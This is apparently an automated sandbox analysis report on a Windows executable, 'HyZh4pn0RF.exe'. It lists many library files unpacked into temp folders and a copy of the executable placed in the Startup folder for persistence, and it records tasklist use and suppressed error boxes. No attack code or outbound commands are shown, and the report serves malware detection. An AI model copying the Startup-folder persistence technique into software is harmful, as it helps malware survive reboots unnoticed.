Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_ARC4.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\VCRUNTIME140_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\PublicKey\_x25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Util\_strxor.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\charset_normalizer\md__mypyc.cp312-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Math\_modexp.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\PublicKey\_x25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\_queue.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\libssl-3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\charset_normalizer\md__mypyc.cp312-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\libffi-8.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\libcrypto-3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_chacha20.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Util\_strxor.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_des.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\charset_normalizer\md.cp312-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\pywin32_system32\pywintypes312.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_chacha20.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_poly1305.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\charset_normalizer\md.cp312-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_MD4.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\_cffi_backend.cp312-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\_cffi_backend.cp312-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_des.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\win32\win32api.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\libcrypto-3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\_uuid.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\_uuid.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Util\_cpuid_c.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_poly1305.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_pkcs1_decode.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\PublicKey\_ed25519.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\_wmi.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\_wmi.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\PublicKey\_ed448.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Math\_modexp.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Util\_cpuid_c.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\PublicKey\_ed448.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_pkcs1_decode.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\pywin32_system32\pywintypes312.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_MD4.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\libffi-8.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\python312.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\VCRUNTIME140_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\win32\win32api.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_ARC4.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\libssl-3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\PublicKey\_ed25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_aes.pyd	Jump to dropped file

Boot Survival

Drops PE files to the startup folder

Source: C:\Users\user\Desktop\HyZh4pn0RF.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Jump to dropped file

Source: C:\Users\user\Desktop\HyZh4pn0RF.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Jump to behavior

Source: C:\Users\user\Desktop\HyZh4pn0RF.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Jump to behavior

Source: C:\Users\user\Desktop\HyZh4pn0RF.exe

Code function: 0_2_00007FF78F486EF0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00007FF78F486EF0

Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\python312.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_ocb.pyd	Jump to dropped file
